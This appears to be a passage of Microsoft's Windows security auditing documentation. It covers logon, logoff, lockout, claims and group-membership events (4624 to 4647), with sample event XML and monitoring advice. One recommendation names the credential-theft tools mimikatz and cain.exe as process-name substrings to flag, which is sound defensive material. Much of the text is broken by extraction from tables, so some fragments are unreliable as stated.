Status Code [Type = UInt32]: if there are no issues or errors, the status code will be “0”. If an error happened,
you will receive Failure event and Status Code will not be equal to “0”. You can check error code meaning here:
https://msdn.microsoft.com/library/windows/desktop/ms681381(v=vs.85).aspx

For 4933(S, F ): Synchronization of a replica of an Active Directory naming context has ended.
Monitor for Source Address field, because the source of replication (DRA) must be authorized for this
action. If you find any unauthorized DRA you should trigger an event.
Applies to
Windows 10
Windows Server 2016
Audit Account Lockout enables you to audit security events that are generated by a failed attempt to log on to an
account that is locked out.
If you configure this policy setting, an audit event is generated when an account cannot log on to a computer
because the account is locked out.
Account lockout events are essential for understanding user activity and detecting potential attacks.
Event volume: Low.
This subcategory failure logon attempts, when account was already locked out.
STRONGER STRONGER
Domain No Yes No Yes We recommend

Controller tracking account
lockouts,
especially for
high value
domain or local
accounts
(database
administrators,
built-in local
administrator
account, domain
administrators,
service accounts,
domain controller
accounts, and so
on).
This subcategory
doesn’t have
Success events,
so there is no
recommendation
to enable Success
auditing for this
subcategory.
STRONGER STRONGER
Member Server No Yes No Yes We recommend

tracking account
lockouts,
especially for
high value
domain or local
accounts
(database
administrators,
built-in local
administrator
account, domain
administrators,
service accounts,
domain controller
accounts, and so
on).
This subcategory
doesn’t have
Success events,
so there is no
recommendation
to enable Success
auditing for this
subcategory.
Workstation No Yes No Yes We recommend

tracking account
lockouts,
especially for
high value
domain or local
accounts
(database
administrators,
built-in local
administrator
account, domain
administrators,
service accounts,
domain controller
accounts, and so
on).
This subcategory
doesn’t have
Success events,
so there is no
recommendation
to enable Success
auditing for this
subcategory.
Events List:
4625(F ): An account failed to log on.
4625(F): An account failed to log on.
Applies to
Windows 10
Windows Server 2016
Subcategories: Audit Account Lockout and
Audit Logon
Event Description:
This event generates if an account logon
attempt failed when the account was already
locked out. It also generates for a logon
attempt after which the account was locked out.
It generates on the computer where logon
attempt was made, for example, if logon
attempt was made on user’s workstation, then
event will be logged on this workstation.

Event XML:
- <System>
<Level>0</Level>
<Task>12546</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="FailureReason">%%2307</Data>
<Data Name="SubStatus">0x0</Data>
<Data Name="LogonType">2</Data>
<Data Name="LogonProcessName">User32</Data>
<Data Name="AuthenticationPackageName">Negotiate</Data>
<Data Name="WorkstationName">DC01</Data>
<Data Name="LmPackageName">-</Data>
<Data Name="KeyLength">0</Data>
<Data Name="ProcessId">0x1bc</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\winlogon.exe</Data>
<Data Name="IpAddress">127.0.0.1</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that reported information about logon failure. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that reported information about logon
failure.
the following:
Logon Type [Type = UInt32]: the type of logon which was performed. “Table 11. Windows Logon Types” contains
the list of possible values for this field.



Control Manager.

called cleartext).

connections.

Remote Desktop.

the credentials.
Table: Windows Logon Types
Account For Which Logon Failed:

Security ID [Type = SID ]: SID of the account that was specified in the logon attempt. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that was specified in the logon attempt.
following:
Failure Information:
Failure Reason [Type = UnicodeString]: textual explanation of Status field value. For this event it typically
has “Account locked out” value.
Status [Type = HexInt32]: the reason why logon failed. For this event it typically has “0xC0000234” value.
The most common status codes are listed in “Table 12. Windows logon status codes.”
STATUS\SUB-STATUS CODE DESCRIPTION
0XC000005E There are currently no logon servers available to service the

logon request.
0xC0000064 User logon with misspelled or bad user account
0xC000006A User logon with misspelled or bad password
0XC000006D This is either due to a bad username or authentication

information
0XC000006E Unknown user name or bad password.
0xC000006F User logon outside authorized hours
0xC0000070 User logon from unauthorized workstation
0xC0000071 User logon with expired password
0xC0000072 User logon to account disabled by administrator
0XC00000DC Indicates the Sam Server was in the wrong state to perform
the desired operation.
0XC0000133 Clocks between DC and other computer too far out of sync
0XC000015B The user has not been granted the requested logon type (aka
logon right) at this machine
0XC000018C The logon request failed because the trust relationship

between the primary domain and the trusted domain failed.
0XC0000192 An attempt was made to logon, but the Netlogon service was
not started.
0xC0000193 User logon with expired account
0XC0000224 User is required to change password at next logon
0XC0000225 Evidently a bug in Windows and not a risk
0xC0000234 User logon with account locked
0XC00002EE Failure Reason: An Error occurred during Logon
0XC0000413 Logon Failure: The machine you are logging onto is protected
by an authentication firewall. The specified account is not
allowed to authenticate to the machine.
0x0 Status OK.
Table: Windows logon status codes.

Note To see the meaning of other status\sub-status codes you may also check for status code in the Window
header file ntstatus.h in Windows SDK.
More information: https://dev.windows.com/en-us/downloads
Sub Status [Type = HexInt32]: additional information about logon failure. The most common sub-status codes
listed in the “Table 12. Windows logon status codes.”.
Caller Process ID [Type = Pointer]: hexadecimal Process ID of the process that attempted the logon.
Process ID (PID ) is a number used by the operating system to uniquely identify an active process. To see the
PID for a specific process you can, for example, use Task Manager (Details tab, PID column):
Caller Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Workstation Name [Type = UnicodeString]: machine name from which logon attempt was performed.
Source Network Address [Type = UnicodeString]: IP address of machine from which logon attempt was
performed.
IPv6 address or ::ffff:IPv4 address of a client.
::1 or 127.0.0.1 means localhost.
Source Port [Type = UnicodeString]: source port which was used for logon attempt from remote machine.
0 for interactive logons.
Detailed Authentication Information:
Logon Process [Type = UnicodeString]: the name of the trusted logon process that was used for the logon
attempt. See event “4611: A trusted logon process has been registered with the Local Security Authority”
description for more information.
Authentication Package [Type = UnicodeString]: The name of the authentication package which was used
for the logon authentication process. Default packages loaded on LSA startup are located in
“HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig” registry key. Other packages can be loaded at
runtime. When a new package is loaded a “4610: An authentication package has been loaded by the Local
Security Authority” (typically for NTLM ) or “4622: A security package has been loaded by the Local Security
Authority” (typically for Kerberos) event is logged to indicate that a new package has been loaded along with
the package name. The most common authentication packages are:
NTLM – NTLM -family Authentication
Kerberos – Kerberos authentication.
Negotiate – the Negotiate security package selects between Kerberos and NTLM protocols.
Negotiate selects Kerberos unless it cannot be used by one of the systems involved in the
authentication or the calling application did not provide sufficient information to use Kerberos.
Transited Services [Type = UnicodeString] [Kerberos-only]: the list of transmitted services. Transmitted
services are populated if the logon was a result of a S4U (Service For User) logon process. S4U is a
Microsoft extension to the Kerberos Protocol to allow an application service to obtain a Kerberos service
ticket on behalf of a user – most commonly done by a front-end website to access an internal resource on
behalf of a user. For more information about S4U, see https://msdn.microsoft.com/library/cc246072.aspx
Package Name (NTLM only) [Type = UnicodeString]: The name of the LAN Manager sub-package
(NTLM -family protocol name) that was used during the logon attempt. Possible values are:
“NTLM V1”
“NTLM V2”
“LM”
Only populated if “Authentication Package” = “NTLM”.
Key Length [Type = UInt32]: the length of NTLM Session Security key. Typically it has 128 bit or 56 bit
length. This parameter is always 0 if “Authentication Package” = “Kerberos”, because it is not applicable
for Kerberos protocol. This field will also have “0” value if Kerberos was negotiated using Negotiate
authentication package.

For 4625(F ): An account failed to log on.
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or
“cain.exe”), check for these substrings in “Process Name.”
If Subject\Account Name is a name of service account or user account, it may be useful to investigate
whether that account is allowed (or expected) to request logon for Account For Which Logon
Failed\Security ID.
To monitor for a mismatch between the logon type and the account that uses it (for example, if Logon Type
4-Batch or 5-Service is used by a member of a domain administrative group), monitor Logon Type in this
event.
If you have a high-value domain or local account for which you need to monitor every lockout, monitor all
4625 events with the “Subject\Security ID” that corresponds to the account.
We recommend monitoring all 4625 events for local accounts, because these accounts typically should not
be locked out. This is especially relevant for critical servers, administrative workstations, and other high value
assets.
We recommend monitoring all 4625 events for service accounts, because these accounts should not be
locked out or prevented from functioning. This is especially relevant for critical servers, administrative
workstations, and other high value assets.
If your organization restricts logons in the following ways, you can use this event to monitor accordingly:
If the “Account For Which Logon Failed \Security ID” should never be used to log on from the
specific Network Information\Workstation Name.
If a specific account, such as a service account, should only be used from your internal IP address list
(or some other list of IP addresses). In this case, you can monitor for Network Information\Source
Network Address and compare the network address with your list of IP addresses.
If a particular version of NTLM is always used in your organization. In this case, you can use this
event to monitor Package Name (NTLM only), for example, to find events where Package Name
(NTLM only) does not equal NTLM V2.
If NTLM is not used in your organization, or should not be used by a specific account (New
Logon\Security ID ). In this case, monitor for all events where Authentication Package is NTLM.
If the Authentication Package is NTLM. In this case, monitor for Key Length not equal to 128,
because all Windows operating systems starting with Windows 2000 support 128-bit Key Length.
If Logon Process is not from a trusted logon processes list.
Monitor for all events with the fields and values in the following table:
FIELD VALUE TO MONITOR FOR
Failure Information\Status or 0XC000005E – “There are currently no logon servers available

Failure Information\Sub Status to service the logon request.”
This is typically not a security issue but it can be an
infrastructure or availability issue.
Failure Information\Status or 0xC0000064 – “User logon with misspelled or bad user

Failure Information\Sub Status account”.
Especially if you get a number of these in a row, it can be a
sign of user enumeration attack.
Failure Information\Status or 0xC000006A – “User logon with misspelled or bad password”

Failure Information\Sub Status for critical accounts or service accounts.
Especially watch for a number of such events in a row.
Failure Information\Status or 0XC000006D – “This is either due to a bad username or

Failure Information\Sub Status authentication information” for critical accounts or service
accounts.
Failure Information\Status or 0xC000006F – “User logon outside authorized hours”.

Failure Information\Sub Status
Failure Information\Status or 0xC0000070 – “User logon from unauthorized workstation”.

Failure Information\Status or 0xC0000072 – “User logon to account disabled by

Failure Information\Sub Status administrator”.
Failure Information\Status or 0XC000015B – “The user has not been granted the requested
Failure Information\Sub Status logon type (aka logon right) at this machine”.
Failure Information\Status or 0XC0000192 – “An attempt was made to logon, but the
Failure Information\Sub Status Netlogon service was not started”.
Failure Information\Status or 0xC0000193 – “User logon with expired account”.

Failure Information\Status or 0XC0000413 – “Logon Failure: The machine you are logging
Failure Information\Sub Status onto is protected by an authentication firewall. The specified
account is not allowed to authenticate to the machine”.
Applies to
Windows 10
Windows Server 2016
Audit User/Device Claims allows you to audit user and device claims information in the account’s logon token.
Events in this subcategory are generated on the computer on which a logon session is created. For an interactive
logon, the security audit event is generated on the computer that the user logged on to.
For a network logon, such as accessing a shared folder on the network, the security audit event is generated on the
computer hosting the resource.
Important: Audit Logon subcategory must also be enabled in order to get events from this subcategory.
Event volume:
Low on a client computer.
Medium on a domain controller or network servers.
STRONGER STRONGER
Domain IF No IF No IF – if claims are

Controller in use in your
organization and
you need to
monitor
user/device
claims, enable
Success auditing
for this
subcategory.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Member Server IF No IF No IF – if claims are

in use in your
organization and
you need to
monitor
user/device
claims, enable
Success auditing
for this
subcategory.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Workstation IF No IF No IF – if claims are

in use in your
organization and
you need to
monitor
user/device
claims, enable
Success auditing
for this
subcategory.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4626(S ): User/Device claims information.
4626(S): User/Device claims information.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit
User/Device Claims
Event Description:
This event generates for new
account logons and contains
user/device claims which were
associated with a new logon
session.
This event does not generate if
the user/device doesn’t have
claims.
For computer account logons
you will also see device claims
listed in the “User Claims” field.
You will typically get “4624: An
account was successfully logged
on” and after it a 4626 event
with the same information in
Subject, Logon Type and New
Logon sections.
This event generates on the
computer to which the logon
was performed (target
computer). For example, for
Interactive logons it will be the
same computer.
Note For recommendations,

see Security Monitoring Recommendations for this event.
Event XML:
- <System>
<Level>0</Level>
<Task>12553</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectUserName">-</Data>
<Data Name="SubjectDomainName">-</Data>
<Data Name="TargetLogonId">0x136f7b</Data>
<Data Name="EventIdx">1</Data>
<Data Name="EventCountTotal">1</Data>
<Data Name="UserClaims">ad://ext/cn:88d2b96fdb2b4c49 <%%1818> : "dadmin" ad://ext/Department:88d16a8edaa8c66b
<%%1818> : "IT"</Data>
<Data Name="DeviceClaims">-</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that reported information about claims. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that reported information about claims.
the following:
Logon Type [Type = UInt32]: the type of logon which was performed. The table below contains the list of possible
values for this field:



Control Manager.

called cleartext).

connections.

Remote Desktop.

the credentials.
New Logon:
Security ID [Type = SID ]: SID of account for which logon was performed. Event Viewer automatically tries to
event.
Account Name [Type = UnicodeString]: the name of the account for which logon was performed.
the following:
Event in sequence [Type = UInt32]: If is there is not enough space in one event to put all claims, you will see “1
of N” in this field and additional events will be generated. Typically this field has “1 of 1” value.
User Claims [Type = UnicodeString]: list of user claims for new logon session. This field contains user claims if
user account was logged in and device claims if computer account was logged in. Here is an example how to parse
the entrance of this field:
ad://ext/cn:88d2b96fdb2b4c49 <String> : “dadmin”
cn – claim display name.
88d2b96fdb2b4c49 – unique claim ID.
<String> - claim type.
“dadmin” – claim value.
Device Claims [Type = UnicodeString]: list of device claims for new logon session. For user accounts this field
typically has “-“ value. For computer accounts this field has device claims listed.

For 4626(S ): User/Device claims information.
Typically this action is reported by the NULL SID account, so we recommend reporting all events with
“Subject\Security ID” not equal “NULL SID”.
If you need to monitor account logons with specific claims, you can monitor for 4626 and check User
Claims\Device Claims fields.
If you have specific requirements, such as:
Users with specific claims should not access specific computers;
Computer account should not have specific claims;
User account should not have specific claims;
Claim should not be empty
And so on…
You can monitor for 4626 and check User Claims\Device Claims fields.
If you need to monitor computer/user logon attempts only and you don’t need information about claims,
then it is better to monitor “4624: An account was successfully logged on.”
Applies to
Windows 10
Windows Server 2016
Audit Group Membership enables you to audit group memberships when they are enumerated on the client
computer.
This policy allows you to audit the group membership information in the user's logon token. Events in this
subcategory are generated on the computer on which a logon session is created.
For an interactive logon, the security audit event is generated on the computer that the user logged on to. For a
network logon, such as accessing a shared folder on the network, the security audit event is generated on the
computer hosting the resource.
You must also enable the Audit Logon subcategory.
Multiple events are generated if the group membership information cannot fit in a single security audit event
Event volume:
Medium on a domain controller or network servers.
STRONGER STRONGER
STRONGER STRONGER
Domain Yes No Yes No Group

Controller membership
information for
logged in user
can help to
detect that
member of
specific domain
or local group
logged in to the
machine (for
example, member
of database
administrators,
built-in local
administrators,
domain
administrators,
service accounts
group or other
high value
groups).
For
recommendation
s for using and
analyzing the
collected
information, see
the Security
Monitoring
Recommendatio
ns sections.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Member Server Yes No Yes No Group

membership
information for
logged in user
can help to
detect that
member of
specific domain
or local group
logged in to the
machine (for
example, member
of database
administrators,
built-in local
administrators,
domain
administrators,
service accounts
group or other
high value
groups).
For
recommendation
s for using and
analyzing the
collected
information, see
the Security
Monitoring
Recommendatio
ns sections.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Workstation Yes No Yes No Group

membership
information for
logged in user
can help to
detect that
member of
specific domain
or local group
logged in to the
machine (for
example, member
of database
administrators,
built-in local
administrators,
domain
administrators,
service accounts
group or other
high value
groups).
For
recommendation
s for using and
analyzing the
collected
information, see
the Security
Monitoring
Recommendatio
ns sections.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4627(S ): Group membership information.
4627(S): Group membership information.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Group Membership
Event Description:
This event generates with “4624(S ): An account was successfully logged on” and shows the list of groups that the
logged-on account belongs to.
You must also enable the Success audit for Audit Logon subcategory to get this event.
Multiple events are generated if the group membership information cannot fit in a single security audit event.
Event XML:
- <System>
<Level>0</Level>
<Task>12554</Task>
<Opcode>0</Opcode>
<Correlation ActivityID="{913FBE70-1CE6-0000-67BF-3F91E61CD101}" />
<Security />
</System>
- <EventData>
<Data Name="TargetLogonId">0x569860</Data>
<Data Name="EventIdx">1</Data>
<Data Name="EventCountTotal">1</Data>
<Data Name="GroupMembership">%{S-1-5-21-1377283216-344919071-3415362939-513} %{S-1-1-0} %{S-1-5-32-544} %{S-1-
5-32-545} %{S-1-5-32-554} %{S-1-5-2} %{S-1-5-11} %{S-1-5-15} %{S-1-5-21-1377283216-344919071-3415362939-512} %
{S-1-5-21-1377283216-344919071-3415362939-572} %{S-1-5-64-10} %{S-1-16-12288}</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that reported information about successful logon or invokes it. Event
Account Name [Type = UnicodeString]: the name of the account that reported information about
successful logon or invokes it.
the following:
that might contain the same Logon ID, for example, “4672(S ): Special privileges assigned to new logon.”
Logon Type [Type = UInt32]: the type of logon which was performed. The table below contains the list of possible



Control Manager.


called cleartext).

connections.

Remote Desktop.

the credentials.
New Logon:
Security ID [Type = SID ]: SID of account for which logon was performed. Event Viewer automatically tries to
event.
Account Name [Type = UnicodeString]: the name of the account for which logon was performed.
the following:
that might contain the same Logon ID, for example, “4672(S ): Special privileges assigned to new logon.”
Event in sequence [Type = UInt32]: If is there is not enough space in one event to put all groups, you will see “1
of N” in this field and additional events will be generated. Typically this field has “1 of 1” value.
Group Membership [Type = UnicodeString]: the list of group SIDs which logged account belongs to (member of).

For 4627(S ): Group membership information.
Typically this action is reported by the NULL SID account, so we recommend reporting all events with
“Subject\Security ID” not equal “NULL SID”.
If you need to track that a member of a specific group logged on to a computer, check the “Group
Membership” field.
Applies to
Windows 10
Windows Server 2016
Audit IPsec Extended Mode allows you to audit events generated by Internet Key Exchange protocol (IKE ) and
Authenticated Internet Protocol (AuthIP ) during Extended Mode negotiations.
Audit IPsec Extended Mode subcategory is out of scope of this document, because this subcategory is mainly used
for IPsec Extended Mode troubleshooting.
STRONGER STRONGER
Domain IF IF IF IF IF - This
Controller subcategory is
mainly used for
IPsec Extended
Mode
troubleshooting,
or for tracing or
monitoring IPsec
Extended Mode
operations.
Member Server IF IF IF IF IF - This

subcategory is
mainly used for
IPsec Extended
Mode
troubleshooting,
or for tracing or
monitoring IPsec
Extended Mode
operations.
Workstation IF IF IF IF IF - This
subcategory is
mainly used for
IPsec Extended
Mode
troubleshooting,
or for tracing or
monitoring IPsec
Extended Mode
operations.
4978(S): During Extended Mode negotiation, IPsec received an invalid

negotiation packet. If this problem persists, it could indicate a network
issue or an attempt to modify or replay this negotiation.
4979(S): IPsec Main Mode and Extended Mode security associations
were established.
were established.
were established.
were established.
4983(S): An IPsec Extended Mode negotiation failed. The
corresponding Main Mode security association has been deleted.
4984(S): An IPsec Extended Mode negotiation failed. The
corresponding Main Mode security association has been deleted.
Applies to
Windows 10
Windows Server 2016
Audit IPsec Main Mode allows you to audit events generated by Internet Key Exchange protocol (IKE ) and
Authenticated Internet Protocol (AuthIP ) during Main Mode negotiations.
Audit IPsec Main Mode subcategory is out of scope of this document, because this subcategory is mainly used for
IPsec Main Mode troubleshooting.
STRONGER STRONGER
mainly used for
IPsec Main Mode
troubleshooting,
or for tracing or
monitoring IPsec
Main Mode
operations.

subcategory is
mainly used for
IPsec Main Mode
troubleshooting,
or for tracing or
monitoring IPsec
Main Mode
operations.
subcategory is
mainly used for
IPsec Main Mode
troubleshooting,
or for tracing or
monitoring IPsec
Main Mode
operations.
4646(S): Security ID: %1

4650(S): An IPsec Main Mode security association was established.
Extended Mode was not enabled. Certificate authentication was not
used.
4651(S): An IPsec Main Mode security association was established.
Extended Mode was not enabled. A certificate was used for
authentication.
4652(F): An IPsec Main Mode negotiation failed.
4653(F): An IPsec Main Mode negotiation failed.
4655(S): An IPsec Main Mode security association ended.
4976(S): During Main Mode negotiation, IPsec received an invalid
5049(S): An IPsec Security Association was deleted.
5453(S): An IPsec negotiation with a remote computer failed because
the IKE and AuthIP IPsec Keying Modules (IKEEXT) service is not
started.
Applies to
Windows 10
Windows Server 2016
Audit IPsec Quick Mode allows you to audit events generated by Internet Key Exchange protocol (IKE ) and
Authenticated Internet Protocol (AuthIP ) during Quick Mode negotiations.
Audit IPsec Quick Mode subcategory is out of scope of this document, because this subcategory is mainly used for
IPsec Quick Mode troubleshooting.
STRONGER STRONGER
mainly used for
IPsec Quick
Mode
troubleshooting,
or for tracing or
monitoring IPsec
Quick Mode
operations.

subcategory is
mainly used for
IPsec Quick
Mode
troubleshooting,
or for tracing or
monitoring IPsec
Quick Mode
operations.
subcategory is
mainly used for
IPsec Quick
Mode
troubleshooting,
or for tracing or
monitoring IPsec
Quick Mode
operations.
4977(S): During Quick Mode negotiation, IPsec received an invalid

5451(S): An IPsec Quick Mode security association was established.
5452(S): An IPsec Quick Mode security association ended.
Audit Logoff
Applies to
Windows 10
Windows Server 2016
Audit Logoff determines whether the operating system generates audit events when logon sessions are
terminated.
These events occur on the computer that was accessed. In the case of an interactive logon, these events are
generated on the computer that was logged on to.
There is no failure event in this subcategory because failed logoffs (such as when a system abruptly shuts down)
do not generate an audit record.
Logon events are essential to understanding user activity and detecting potential attacks. Logoff events are not
100 percent reliable. For example, the computer can be turned off without a proper logoff and shutdown; in this
case, a logoff event is not generated.
Event volume: High.
This subcategory allows you to audit events generated by the closing of a logon session. These events occur on
the computer that was accessed. For an interactive logoff the security audit event is generated on the computer
that the user account logged on to.
STRONGER STRONGER
STRONGER STRONGER
Domain No No Yes No This subcategory

Controller typically
generates huge
amount of
“4634(S): An
account was
logged off.”
events, which
typically have
little security
relevance. It is
more important
to audit Logon
events using
Audit Logon
subcategory,
rather than
Logoff events.
Enable Success
audit if you want
to track, for
example, for how
long session was
active (in
correlation with
Audit Logon
events) and when
user actually
logged off.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Member Server No No Yes No This subcategory

typically
generates huge
amount of
“4634(S): An
account was
logged off.”
events, which
typically have
little security
relevance. It is
more important
to audit Logon
events using
Audit Logon
subcategory,
rather than
Logoff events.
Enable Success
audit if you want
to track, for
example, for how
long session was
active (in
correlation with
Audit Logon
events) and when
user actually
logged off.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Workstation No No Yes No This subcategory

typically
generates huge
amount of
“4634(S): An
account was
logged off.”
events, which
typically have
little security
relevance. It is
more important
to audit Logon
events using
Audit Logon
subcategory,
rather than
Logoff events.
Enable Success
audit if you want
to track, for
example, for how
long session was
active (in
correlation with
Audit Logon
events) and when
user actually
logged off.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4634(S ): An account was logged off.
4647(S ): User initiated logoff.
4634(S): An account was logged off.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Logoff
Event Description:
This event shows that logon session was
terminated and no longer exists.
The main difference between “4647: User
initiated logoff.” and 4634 event is that 4647
event is generated when logoff procedure was
initiated by specific account using logoff
function, and 4634 event shows that session
was terminated and no longer exists.
4647 is more typical for Interactive and
RemoteInteractive logon types when user
was logged off using standard methods. You
will typically see both 4647 and 4634 events
when logoff procedure was initiated by user.
It may be positively correlated with a “4624: An account was successfully logged on.” event using the Logon ID
value. Logon IDs are only unique between reboots on the same computer.
Event XML:
- <System>
<Level>0</Level>
<Task>12545</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserSid">S-1-5-90-1</Data>
<Data Name="TargetUserName">DWM-1</Data>
<Data Name="TargetDomainName">Window Manager</Data>
<Data Name="TargetLogonId">0x1a0992</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that was logged off. Event Viewer automatically tries to resolve SIDs
Account Name [Type = UnicodeString]: the name of the account that was logged off.
the following:
Logon Type [Type = UInt32]: the type of logon which was used. The table below contains the list of possible



Control Manager.

called cleartext).

connections.

Remote Desktop.

the credentials.

For 4634(S ): An account was logged off.
If a particular Logon Type should not be used by a particular account (for example if Logon Type 4-Batch or
5-Service is used by a member of a domain administrative group), monitor this event for such actions.
4647(S): User initiated logoff.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Logoff
Event Description:
This event is generated when a logoff is
initiated. No further user-initiated activity can
occur. This event can be interpreted as a logoff
event.
The main difference with “4634(S ): An account
was logged off.” event is that 4647 event is
generated when logoff procedure was initiated
by specific account using logoff function, and
4634 event shows that session was terminated
and no longer exists.
4647 is more typical for Interactive and
RemoteInteractive logon types when user
was logged off using standard methods. You will typically see both 4647 and 4634 events when logoff procedure
was initiated by user.
It may be positively correlated with a “4624: An account was successfully logged on.” event using the Logon ID
value. Logon IDs are only unique between reboots on the same computer.
Event XML:
- <System>
<Level>0</Level>
<Task>12545</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetLogonId">0x29b379</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “logoff” operation. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that requested the “logoff” operation.
the following:

For 4647(S ): User initiated logoff.
Audit Logon
Applies to
Windows 10
Windows Server 2016
Audit Logon determines whether the operating system generates audit events when a user attempts to log on
to a computer.
These events are related to the creation of logon sessions and occur on the computer that was accessed. For an
interactive logon, events are generated on the computer that was logged on to. For a network logon, such as
accessing a share, events are generated on the computer that hosts the resource that was accessed.
The following events are recorded:
Logon success and failure.
Logon attempts by using explicit credentials. This event is generated when a process attempts to log on
an account by explicitly specifying that account's credentials. This most commonly occurs in batch
configurations such as scheduled tasks, or when using the RunAs command.
Security identifiers (SIDs) are filtered.
Logon events are essential to tracking user activity and detecting potential attacks.
Event volume:
Medium on a domain controllers or network servers.
GENERAL STRONGER STRONGER

COMPUTER TYPE SUCCESS GENERAL FAILURE SUCCESS FAILURE COMMENTS
Domain Yes Yes Yes Yes Audit Logon

Controller events, for
example, will give
you information
about which
account, when,
using which
Logon Type,
from which
machine logged
on to this
machine.
Failure events
will show you
failed logon
attempts and
the reason why
these attempts
failed.
Member Server Yes Yes Yes Yes Audit Logon

events, for
example, will give
you information
about which
account, when,
using which
Logon Type,
from which
machine logged
on to this
machine.
Failure events
will show you
failed logon
attempts and
the reason why
these attempts
failed.
Workstation Yes Yes Yes Yes Audit Logon

events, for
example, will give
you information
about which
account, when,
using which
Logon Type,
from which
machine logged
on to this
machine.
Failure events
will show you
failed logon
attempts and
the reason why
these attempts
failed.
Events List:
4624(S ): An account was successfully logged on.
4625(F ): An account failed to log on.
4648(S ): A logon was attempted using explicit credentials.
4675(S ): SIDs were filtered.
4624(S): An account was successfully
logged on.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Logon

Event Description:
This event generates when a logon session is created (on destination machine). It
generates on the computer that was accessed, where the session was created.
Note For recommendations, see Security Monitoring Recommendations for this

event.
Event XML:
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-
A5BA-3E3B0328C30D}" />
<Level>0</Level>
<Task>12544</Task>
<Opcode>0</Opcode>
<Correlation ActivityID="{00D66690-1CDF-0000-AC66-D600DF1CD101}" />
<Computer>WIN-GG82ULGC9GO</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Administrator</Data>
<Data Name="TargetDomainName">WIN-GG82ULGC9GO</Data>
<Data Name="TargetLogonId">0x8dcdc</Data>
<Data Name="WorkstationName">WIN-GG82ULGC9GO</Data>
<Data Name="LogonGuid">{00000000-0000-0000-0000-000000000000}</Data>
<Data Name="ProcessId">0x44c</Data>
<Data Name="ImpersonationLevel">%%1833</Data>
<Data Name="RestrictedAdminMode">-</Data>
<Data Name="TargetOutboundUserName">-</Data>
<Data Name="TargetOutboundDomainName">-</Data>
<Data Name="VirtualAccount">%%1843</Data>
<Data Name="TargetLinkedLogonId">0x0</Data>
<Data Name="ElevatedToken">%%1842</Data>
</EventData>
</Event>

Event Versions:
1 - Windows Server 2012, Windows 8.
Added “Impersonation Level” field.
2 – Windows 10.
Added “Logon Information:” section.
Logon Type moved to “Logon Information:” section.
Added “Restricted Admin Mode” field.
Added “Virtual Account” field.
Added “Elevated Token” field.
Added “Linked Logon ID” field.
Added “Network Account Name” field.
Added “Network Account Domain” field.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that reported information about
successful logon or invokes it. Event Viewer automatically tries to resolve SIDs and
show the account name. If the SID cannot be resolved, you will see the source data
in the event.
Note A security identifier (SID ) is a unique value of variable length used to

identify a trustee (security principal). Each account has a unique SID that is issued
by an authority, such as an Active Directory domain controller, and stored in a
security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system
uses the SID in the access token to identify the user in all subsequent interactions
with Windows security. When a SID has been used as the unique identifier for a
user or group, it cannot ever be used again to identify another user or group. For
Account Name [Type = UnicodeString]: the name of the account that

reported information about successful logon.
Account Domain [Type = UnicodeString]: subject’s domain or computer
name. Formats vary, and include the following:
For some well-known security principals, such as LOCAL SERVICE or
ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer
or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate
this event with recent events that might contain the same Logon ID, for
example, “4672(S ): Special privileges assigned to new logon.”
Logon Information [Version 2]**: **
Logon Type [Version 0, 1, 2] [Type = UInt32]: the type of logon which was
performed. The table below contains the list of possible values for this field.
Logon types and descriptions

2 Interactive A user logged on to this

computer.
3 Network A user or computer logged

on to this computer from the
network.
4 Batch Batch logon type is used by

batch servers, where
processes may be executing
on behalf of a user without
5 Service A service was started by the

Service Control Manager.
7 Unlock This workstation was

unlocked.
